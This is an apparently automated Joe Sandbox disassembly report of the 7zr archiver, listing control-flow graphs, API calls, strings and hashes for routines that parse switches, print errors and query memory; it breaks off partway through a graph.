                                        • Instruction ID: f100ef913e4c90b4606642d82e710ed78f803a84cfe47c00e12f44950e2bc12b
                                        • Opcode Fuzzy Hash: bbb72a3a0dd79dd50d68416de2f6a0c6060ac9f8af2ed012839c3eac67d5de76
                                        • Instruction Fuzzy Hash: A5226E31900209DFDF25EFA8D889BADBBB2FF45311F20005BE545A7292CB359A85CF65

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 672 5b1ade-5b1b14 call 63fb10 call 5a13f5 677 5b1b32-5b1b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 5b1b16-5b1b2d call 5c1d73 _CxxThrowException 672->678 680 5b1b9d-5b1b9f 677->680 681 5b1b8d-5b1b91 677->681 678->677 682 5b1ba0-5b1bcd 680->682 681->680 684 5b1b93-5b1b97 681->684 685 5b1bf9-5b1c12 682->685 686 5b1bcf-5b1bf8 call 5b1ea4 call 5a27bb call 5a1e40 682->686 684->680 687 5b1b99-5b1b9b 684->687 689 5b1c20 685->689 690 5b1c14-5b1c18 685->690 686->685 687->682 693 5b1c27-5b1c2b 689->693 690->689 692 5b1c1a-5b1c1e 690->692 692->689 692->693 695 5b1c2d 693->695 696 5b1c34-5b1c3e 693->696 695->696 698 5b1c49-5b1c53 696->698 699 5b1c40-5b1c43 696->699 700 5b1c5e-5b1c68 698->700 701 5b1c55-5b1c58 698->701 699->698 703 5b1c6a-5b1c6d 700->703 704 5b1c73-5b1c79 700->704 701->700 703->704 706 5b1c7b-5b1c87 704->706 707 5b1cc9-5b1cd2 704->707 708 5b1c89-5b1c93 706->708 709 5b1c95-5b1ca1 call 5b1ed1 706->709 710 5b1cea call 5b1eb9 707->710 711 5b1cd4-5b1ce6 707->711 708->707 718 5b1ca3-5b1cbb call 5c1d73 _CxxThrowException 709->718 719 5b1cc0-5b1cc3 709->719 714 5b1cef-5b1cf8 710->714 711->710 716 5b1cfa-5b1d0a 714->716 717 5b1d37-5b1d40 714->717 720 5b1dc2-5b1dd4 wcscmp 716->720 721 5b1d10 716->721 723 5b1e93-5b1ea1 717->723 724 5b1d46-5b1d52 717->724 718->719 719->707 725 5b1d17-5b1d1f call 5a9399 720->725 727 5b1dda-5b1de6 call 5b1ed1 720->727 721->725 724->723 728 5b1d58-5b1d93 call 5a26dd call 5a280c call 5a3221 call 5a3bbf 724->728 725->717 737 5b1d21-5b1d32 call 626a60 call 5a9313 725->737 727->725 735 5b1dec-5b1e04 call 5c1d73 _CxxThrowException 727->735 756 5b1d9f-5b1da3 728->756 757 5b1d95-5b1d9c 728->757 744 5b1e09-5b1e0c 735->744 737->717 747 5b1e0e 744->747 748 5b1e31-5b1e4a call 5b1f0c GetCurrentProcess SetProcessAffinityMask 744->748 751 5b1e10-5b1e12 747->751 752 5b1e14-5b1e2c call 5c1d73 _CxxThrowException 747->752 761 5b1e4c-5b1e82 GetLastError call 5a3221 call 5a58a9 call 5a31e5 call 5a1e40 748->761 762 5b1e83-5b1e92 call 5a3172 call 5a1e40 748->762 751->748 751->752 752->748 756->744 760 5b1da5-5b1dbd call 5c1d73 _CxxThrowException 756->760 757->756 760->720 761->762 762->723
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005B1AE3
                                          • Part of subcall function 005A13F5: __EH_prolog.LIBCMT ref: 005A13FA
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1B2D
                                        • _fileno.MSVCRT ref: 005B1B3E
                                        • _isatty.MSVCRT ref: 005B1B47
                                        • _fileno.MSVCRT ref: 005B1B5D
                                        • _isatty.MSVCRT ref: 005B1B60
                                        • _fileno.MSVCRT ref: 005B1B73
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1CBB
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1DBD
                                        • wcscmp.MSVCRT ref: 005B1DCA
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1E04
                                        • _isatty.MSVCRT ref: 005B1B76
                                          • Part of subcall function 005C1D73: __EH_prolog.LIBCMT ref: 005C1D78
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005B1E2C
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 005B1E3B
                                        • SetProcessAffinityMask.KERNEL32(00000000), ref: 005B1E42
                                        • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 005B1E4C
                                        Strings
                                        • Unsupported switch postfix for -slp, xrefs: 005B1DF1
                                        • unsupported value -stm, xrefs: 005B1E19
                                        • Set process affinity mask: , xrefs: 005B1D74
                                        • Unsupported switch postfix -bb, xrefs: 005B1CA8
                                        • Unsupported switch postfix -stm, xrefs: 005B1DAA
                                        • SeLockMemoryPrivilege, xrefs: 005B1D28
                                        • : ERROR : , xrefs: 005B1E52
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                                        • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                                        • API String ID: 1826148334-1115009270
                                        • Opcode ID: c7d37602a532b0b46f108c531f153f70f015d94fdac41fc267a6bbf879b23506
                                        • Instruction ID: 808ea470f434b6e09deb81b57e260f2f10ec2474cdd525c6a83126045868713c
                                        • Opcode Fuzzy Hash: c7d37602a532b0b46f108c531f153f70f015d94fdac41fc267a6bbf879b23506
                                        • Instruction Fuzzy Hash: EEC11F319006469FDB51DFB8C898BDDBFF6BF0A314F048459E485972A2CB74AD44CB68

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 777 5d8012-5d8032 call 63fb10 780 5d8038-5d806c fputs call 5d8341 777->780 781 5d8285 777->781 785 5d806e-5d8071 780->785 786 5d80c8-5d80cd 780->786 782 5d8287-5d8295 781->782 789 5d808b-5d808d 785->789 790 5d8073-5d8089 fputs call 5a1fa0 785->790 787 5d80cf-5d80d4 786->787 788 5d80d6-5d80df 786->788 793 5d80e2-5d8110 call 5d8341 call 5d8622 787->793 788->793 791 5d808f-5d8094 789->791 792 5d8096-5d809f 789->792 790->786 795 5d80a2-5d80c7 call 5a2e47 call 5d85c6 call 5a1e40 791->795 792->795 804 5d811e-5d812f call 5d8565 793->804 805 5d8112-5d8119 call 5d831f 793->805 795->786 804->782 812 5d8135-5d813f 804->812 805->804 813 5d814d-5d815b 812->813 814 5d8141-5d8148 call 5d82bb 812->814 813->782 817 5d8161-5d8164 813->817 814->813 818 5d81b6-5d81c0 817->818 819 5d8166-5d8186 817->819 820 5d8276-5d827f 818->820 821 5d81c6-5d81e1 fputs 818->821 823 5d818c-5d8196 call 5d8565 819->823 824 5d8298-5d829d 819->824 820->780 820->781 821->820 827 5d81e7-5d81fb 821->827 829 5d819b-5d819d 823->829 828 5d82b1-5d82b9 SysFreeString 824->828 830 5d81fd-5d821f 827->830 831 5d8273 827->831 828->782 829->824 832 5d81a3-5d81b4 SysFreeString 829->832 834 5d829f-5d82a1 830->834 835 5d8221-5d8245 830->835 831->820 832->818 832->819 836 5d82ae 834->836 838 5d8247-5d8271 call 5d84a7 call 5a965d SysFreeString 835->838 839 5d82a3-5d82ab call 5a965d 835->839 836->828 838->830 838->831 839->836
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D8017
                                        • fputs.MSVCRT ref: 005D804D
                                          • Part of subcall function 005D8341: __EH_prolog.LIBCMT ref: 005D8346
                                          • Part of subcall function 005D8341: fputs.MSVCRT ref: 005D835B
                                          • Part of subcall function 005D8341: fputs.MSVCRT ref: 005D8364
                                        • fputs.MSVCRT ref: 005D807A
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                          • Part of subcall function 005A965D: VariantClear.OLEAUT32(?), ref: 005A967F
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D81AA
                                        • fputs.MSVCRT ref: 005D81CD
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D8267
                                        • SysFreeString.OLEAUT32(00000000), ref: 005D82B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                        • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                        • API String ID: 2889736305-3797937567
                                        • Opcode ID: fe938a0335edd78455ee998727d228b5bd7126ceadd661a5e85de8a082126df5
                                        • Instruction ID: 75987434d87945588a6187f7bea8b196c6ecd051ca71e06646992bcc8ef6a3d0
                                        • Opcode Fuzzy Hash: fe938a0335edd78455ee998727d228b5bd7126ceadd661a5e85de8a082126df5
                                        • Instruction Fuzzy Hash: 34914B75A00605EFDB24DFA8CD85ABEBBB6FF48310F10452AE512A7391DB70AD05CB60

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 846 5d6766-5d6792 call 63fb10 EnterCriticalSection 849 5d67af-5d67b7 846->849 850 5d6794-5d6799 call 5dc7d7 846->850 851 5d67be-5d67c3 849->851 852 5d67b9 call 5a1f91 849->852 854 5d679e-5d67ac 850->854 856 5d67c9-5d67d5 851->856 857 5d6892-5d68a8 851->857 852->851 854->849 858 5d6817-5d682f 856->858 859 5d67d7-5d67dd 856->859 860 5d68ae-5d68b4 857->860 861 5d6941 857->861 864 5d6831-5d6842 call 5a1fa0 858->864 865 5d6873-5d687b 858->865 859->858 862 5d67df-5d67eb 859->862 860->861 863 5d68ba-5d68c2 860->863 866 5d6943-5d695a 861->866 869 5d67ed 862->869 870 5d67f3-5d6801 862->870 868 5d6933-5d693f call 5dc5cd 863->868 871 5d68c4-5d68e6 call 5a1fa0 fputs 863->871 864->865 883 5d6844-5d686c fputs call 5a2201 864->883 867 5d6881-5d6887 865->867 865->868 867->868 873 5d688d 867->873 868->866 869->870 870->865 875 5d6803-5d6815 fputs 870->875 887 5d68e8-5d68f9 fputs 871->887 888 5d68fb-5d6917 call 5b4f2a call 5a1fb3 call 5a1e40 871->888 879 5d692e call 5a1f91 873->879 881 5d686e call 5a1fa0 875->881 879->868 881->865 883->881 890 5d691c-5d6928 call 5a1fa0 887->890 888->890 890->879
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D676B
                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D6781
                                        • fputs.MSVCRT ref: 005D680B
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D6944
                                          • Part of subcall function 005DC7D7: fputs.MSVCRT ref: 005DC840
                                        • fputs.MSVCRT ref: 005D6851
                                          • Part of subcall function 005A2201: fputs.MSVCRT ref: 005A221E
                                        • fputs.MSVCRT ref: 005D68D9
                                        • fputs.MSVCRT ref: 005D68F6
                                          • Part of subcall function 005A1FA0: fputc.MSVCRT ref: 005A1FA7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                        • String ID: v$8)f$8)f$Sub items Errors:
                                        • API String ID: 2670240366-3843526198
                                        • Opcode ID: 09a06930428ea5d06d699f397d528edfaaea9c986b380c3df2015414a692434b
                                        • Instruction ID: 211ada235eefcf49633091c87c6f05a2afbd897e39b361103548446012ac56ad
                                        • Opcode Fuzzy Hash: 09a06930428ea5d06d699f397d528edfaaea9c986b380c3df2015414a692434b
                                        • Instruction Fuzzy Hash: 65517835501A41CFCB35AF68D8A4AAABBE2FF85310F54482FE19A87361DB316C46CB54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 898 5d6359-5d6373 call 63fb10 901 5d639e-5d63af call 5d5a4d 898->901 902 5d6375-5d6385 call 5dc7d7 898->902 908 5d65ee-5d65f1 901->908 909 5d63b5-5d63cd 901->909 902->901 907 5d6387-5d639b 902->907 907->901 910 5d6624-5d663c 908->910 911 5d65f3-5d65fb 908->911 912 5d63cf 909->912 913 5d63d2-5d63d4 909->913 916 5d663e call 5a1f91 910->916 917 5d6643-5d664b 910->917 914 5d66ea call 5dc5cd 911->914 915 5d6601-5d6607 call 5d8012 911->915 912->913 918 5d63df-5d63e7 913->918 919 5d63d6-5d63d9 913->919 929 5d66ef-5d66fd 914->929 932 5d660c-5d660e 915->932 916->917 917->914 921 5d6651-5d668f fputs call 5a211a call 5a1fa0 call 5d8685 917->921 922 5d63e9-5d63f2 call 5a1fa0 918->922 923 5d6411-5d6413 918->923 919->918 920 5d64b1-5d64bc call 5d6700 919->920 947 5d64be-5d64c1 920->947 948 5d64c7-5d64cf 920->948 921->929 983 5d6691-5d6697 921->983 922->923 943 5d63f4-5d640c call 5a210c call 5a1fa0 922->943 930 5d6415-5d641d 923->930 931 5d6442-5d6446 923->931 936 5d641f-5d6425 call 5d6134 930->936 937 5d642a-5d643b 930->937 940 5d6448-5d6450 931->940 941 5d6497-5d649f 931->941 932->929 938 5d6614-5d661f call 5a1fa0 932->938 936->937 937->931 938->914 949 5d647f-5d6490 940->949 950 5d6452-5d647a fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 940->950 941->920 944 5d64a1-5d64ac call 5a1fa0 call 5a1f91 941->944 943->923 944->920 947->948 958 5d65a2-5d65a6 947->958 951 5d64f9-5d64fb 948->951 952 5d64d1-5d64da call 5a1fa0 948->952 949->941 950->949 963 5d64fd-5d6505 951->963 964 5d652a-5d652e 951->964 952->951 980 5d64dc-5d64f4 call 5a210c call 5a1fa0 952->980 966 5d65a8-5d65b6 958->966 967 5d65da-5d65e6 958->967 973 5d6507-5d650d call 5d6134 963->973 974 5d6512-5d6523 963->974 976 5d657f-5d6587 964->976 977 5d6530-5d6538 964->977 978 5d65b8-5d65ca call 5d6244 966->978 979 5d65d3 966->979 967->909 970 5d65ec 967->970 970->908 973->974 974->964 976->958 982 5d6589-5d6595 call 5a1fa0 976->982 985 5d653a-5d6562 fputs call 5a1fa0 call 5a1fb3 call 5a1fa0 977->985 986 5d6567-5d6578 977->986 978->979 996 5d65cc-5d65ce call 5a1f91 978->996 979->967 980->951 982->958 1005 5d6597-5d659d call 5a1f91 982->1005 991 5d66df-5d66e5 call 5a1f91 983->991 992 5d6699-5d669f 983->992 985->986 986->976 991->914 1000 5d66a1-5d66b1 fputs 992->1000 1001 5d66b3-5d66ce call 5b4f2a call 5a1fb3 call 5a1e40 992->1001 996->979 1006 5d66d3-5d66da call 5a1fa0 1000->1006 1001->1006 1005->958 1006->991
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D635E
                                        • fputs.MSVCRT ref: 005D645F
                                          • Part of subcall function 005DC7D7: fputs.MSVCRT ref: 005DC840
                                        • fputs.MSVCRT ref: 005D6547
                                        • fputs.MSVCRT ref: 005D665F
                                        • fputs.MSVCRT ref: 005D66AE
                                          • Part of subcall function 005A1F91: fflush.MSVCRT ref: 005A1F93
                                          • Part of subcall function 005A1FB3: __EH_prolog.LIBCMT ref: 005A1FB8
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs$H_prolog$fflushfree
                                        • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                        • API String ID: 1750297421-1898165966
                                        • Opcode ID: 4726cacd0c88b63e2f0f76938dbb88ca46e5798f0d668424ea7d250d09fec6e6
                                        • Instruction ID: 2287e18fafd45af32a0a2abf491ee3af8e5899ef06dbd57879d620ddcae91552
                                        • Opcode Fuzzy Hash: 4726cacd0c88b63e2f0f76938dbb88ca46e5798f0d668424ea7d250d09fec6e6
                                        • Instruction Fuzzy Hash: 6EB18E34601B428FDB34EF68D995BAABBE2BF85304F04442FE55A47392CB30A845CF64

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1016 5a9c8f-5a9cc2 GetModuleHandleA GetProcAddress 1017 5a9cef-5a9d06 GlobalMemoryStatus 1016->1017 1018 5a9cc4-5a9ccc GlobalMemoryStatusEx 1016->1018 1019 5a9d0b-5a9d0d 1017->1019 1020 5a9d08 1017->1020 1018->1017 1021 5a9cce-5a9cd7 1018->1021 1024 5a9d11-5a9d15 1019->1024 1020->1019 1022 5a9cd9 1021->1022 1023 5a9ce5 1021->1023 1025 5a9cdb-5a9cde 1022->1025 1026 5a9ce0-5a9ce3 1022->1026 1027 5a9ce8-5a9ced 1023->1027 1025->1023 1025->1026 1026->1027 1027->1024
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 005A9CB3
                                        • GetProcAddress.KERNEL32(00000000), ref: 005A9CBA
                                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 005A9CC8
                                        • GlobalMemoryStatus.KERNEL32(?), ref: 005A9CFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                                        • API String ID: 180289352-802862622
                                        • Opcode ID: 65e47c0855a27911124847507d4210bcba684e5afce785636932182ccd070ab1
                                        • Instruction ID: 8ea111973b83a7f0174b0a86316f338a81d17b2b8fa8b6acb97e2bad891d126b
                                        • Opcode Fuzzy Hash: 65e47c0855a27911124847507d4210bcba684e5afce785636932182ccd070ab1
                                        • Instruction Fuzzy Hash: 3F1157749416299BCF24DFA4D8A9AADBBF6BB05725F10041CE442AB240D778A980CB54

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1028 5ef1b2-5ef1ce call 63fb10 call 5b1168 1032 5ef1d3-5ef1d5 1028->1032 1033 5ef36a-5ef378 1032->1033 1034 5ef1db-5ef1e4 call 5ef3e4 1032->1034 1037 5ef1ed-5ef1f2 1034->1037 1038 5ef1e6-5ef1e8 1034->1038 1039 5ef1f4-5ef1f9 1037->1039 1040 5ef203-5ef21a 1037->1040 1038->1033 1039->1040 1041 5ef1fb-5ef1fe 1039->1041 1043 5ef21c-5ef22c _CxxThrowException 1040->1043 1044 5ef231-5ef248 memcpy 1040->1044 1041->1033 1043->1044 1045 5ef24c-5ef257 1044->1045 1046 5ef25c-5ef25e 1045->1046 1047 5ef259 1045->1047 1048 5ef260-5ef26f 1046->1048 1049 5ef281-5ef299 1046->1049 1047->1046 1050 5ef279-5ef27b 1048->1050 1051 5ef271 1048->1051 1057 5ef29b-5ef2a0 1049->1057 1058 5ef311-5ef313 1049->1058 1050->1049 1054 5ef315-5ef318 1050->1054 1052 5ef277 1051->1052 1053 5ef273-5ef275 1051->1053 1052->1050 1053->1050 1053->1052 1056 5ef357-5ef368 1054->1056 1056->1033 1057->1054 1059 5ef2a2-5ef2b5 call 5ef37b 1057->1059 1058->1056 1063 5ef2b7-5ef2cf call 63e1a0 1059->1063 1064 5ef2f0-5ef30c memmove 1059->1064 1067 5ef31a-5ef355 memcpy 1063->1067 1068 5ef2d1-5ef2eb call 5ef37b 1063->1068 1064->1045 1067->1056 1068->1063 1072 5ef2ed 1068->1072 1072->1064
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: Ce$Ce
                                        • API String ID: 3519838083-1067588111
                                        • Opcode ID: bf1427aa8d869c78fe3f610f0859fac52a1af261ad78412507a096533f6e776b
                                        • Instruction ID: d3b7c685d91250838076677bb01a9607ca5a46ec6235e78ae2a79cd2b899c317
                                        • Opcode Fuzzy Hash: bf1427aa8d869c78fe3f610f0859fac52a1af261ad78412507a096533f6e776b
                                        • Instruction Fuzzy Hash: A851947AA003469FDB14DFA5C8C4BBEBBB5FF88354F148429E941AB241DB74AD058B60

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                                        • String ID:
                                        • API String ID: 4012487245-0
                                        • Opcode ID: d672936226651516bda6dd83831356dc489f95ad41f95ddd4613ff5f06aefc3f
                                        • Instruction ID: b057e34318f77a1e99306887b5541d0ea84909849a777af2ca95828bef2a93e0
                                        • Opcode Fuzzy Hash: d672936226651516bda6dd83831356dc489f95ad41f95ddd4613ff5f06aefc3f
                                        • Instruction Fuzzy Hash: 83214A75901749EFDB509FA4DC46E99BB7AFB09B20F00121AF511A33E1D7B45440CF60

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                        • String ID:
                                        • API String ID: 279829931-0
                                        • Opcode ID: 790f36facfc472cffccfc1038191357d396023c056b3ff522ddb5ed596dcb600
                                        • Instruction ID: c57644334c03ee0fb22dbb65f11e8c4dad2ca867c90aa4e2ec4cd99ed71b64ce
                                        • Opcode Fuzzy Hash: 790f36facfc472cffccfc1038191357d396023c056b3ff522ddb5ed596dcb600
                                        • Instruction Fuzzy Hash: 1A01E9B5901619EFDB44AFA0DC56CEE7B7AFB09710B10141AF601B32A1DA759440CB20

                                        Control-flow Graph

                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005C185D
                                          • Part of subcall function 005C021A: __EH_prolog.LIBCMT ref: 005C021F
                                          • Part of subcall function 005C062E: __EH_prolog.LIBCMT ref: 005C0633
                                        • _CxxThrowException.MSVCRT(?,00656010), ref: 005C1961
                                          • Part of subcall function 005C1AA5: __EH_prolog.LIBCMT ref: 005C1AAA
                                        Strings
                                        • Duplicate archive path:, xrefs: 005C1A8D
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrow
                                        • String ID: Duplicate archive path:
                                        • API String ID: 2366012087-4000988232
                                        • Opcode ID: bf0ab091218a594b7f9b2247b5d6bc04fad977456725512792a8d24bc55667a7
                                        • Instruction ID: 59d93caa83434c6c8d0a9bf88a3356cb39abe137decaeb3025f0402e0c48db6e
                                        • Opcode Fuzzy Hash: bf0ab091218a594b7f9b2247b5d6bc04fad977456725512792a8d24bc55667a7
                                        • Instruction Fuzzy Hash: 08816A35D0054ADFCF25EFE4C995ADDBBB5BF99310F1040AAE50267292DB306E05CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1563 5a6c72-5a6c8e call 63fb10 1566 5a6c90-5a6c94 1563->1566 1567 5a6c96-5a6c9e 1563->1567 1566->1567 1568 5a6cd3-5a6cdc call 5a8664 1566->1568 1569 5a6ca0-5a6ca4 1567->1569 1570 5a6ca6-5a6cae 1567->1570 1575 5a6ce2-5a6d02 call 5a67f0 call 5a2f88 call 5a87df 1568->1575 1576 5a6d87-5a6d92 call 5a88c6 1568->1576 1569->1568 1569->1570 1570->1568 1572 5a6cb0-5a6cb5 1570->1572 1572->1568 1574 5a6cb7-5a6cce call 5a67f0 call 5a2f88 1572->1574 1588 5a715d-5a715f 1574->1588 1602 5a6d4a-5a6d61 call 5a7b41 1575->1602 1603 5a6d04-5a6d09 1575->1603 1586 5a6d98-5a6d9e 1576->1586 1587 5a6f4c-5a6f62 call 5a87fa 1576->1587 1586->1587 1591 5a6da4-5a6dc7 call 5a2e47 * 2 1586->1591 1597 5a6f67-5a6f74 call 5a85e2 1587->1597 1598 5a6f64-5a6f66 1587->1598 1595 5a7118-5a7126 1588->1595 1609 5a6dc9-5a6dcf 1591->1609 1610 5a6dd4-5a6dda 1591->1610 1611 5a6fd1-5a6fd8 1597->1611 1612 5a6f76-5a6f7c 1597->1612 1598->1597 1614 5a6d63-5a6d65 1602->1614 1615 5a6d67-5a6d6b 1602->1615 1603->1602 1607 5a6d0b-5a6d38 call 5a9252 1603->1607 1607->1602 1622 5a6d3a-5a6d45 1607->1622 1609->1610 1616 